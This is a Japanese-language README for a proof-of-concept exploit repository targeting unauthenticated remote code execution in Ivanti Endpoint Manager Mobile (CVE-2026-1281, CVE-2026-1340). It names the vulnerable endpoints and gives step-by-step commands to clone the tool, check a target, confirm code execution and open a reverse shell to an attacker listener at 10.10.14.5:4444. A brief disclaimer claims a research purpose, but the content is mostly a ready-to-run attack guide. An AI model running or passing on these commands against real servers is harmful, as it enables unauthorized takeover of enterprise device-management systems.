
# CVE-2026-1281 & CVE-2026-1340 の概念実証 - Bash 算術展開を介した Ivanti EPMM 事前認証 RCE
⚠️ 免責事項: このPoCは教育およびセキュリティ研究の目的のみで提供されています。明示的な許可なく使用することは違法です。
Ivanti Endpoint Manager Mobile (EPMM) に影響を与える CVE-2026-1281 および CVE-2026-1340 の脆弱性を悪用するための完全な Proof of Concept (PoC) です。これらの脆弱性により、Bash Arithmetic Expansion メカニズムを介して認証なしでリモートからの任意コード実行 (RCE) が可能になります。
/mifs/c/appstore/fob/ エンドポイントでのコードインジェクション/mifs/c/aftstore/fob/ エンドポイントでのコードインジェクションgit clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# 脆弱性テスト
python3 exploit.py -t https://target.com -c
# RCE検証
python3 exploit.py -t https://target.com --test-rce
# リバースシェル
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - サイバーセキュリティコンサルタント | Red Teamスペシャリスト
このプロジェクトはMITライセンスの下で提供されています - 詳細については LICENSE ファイルを参照してください。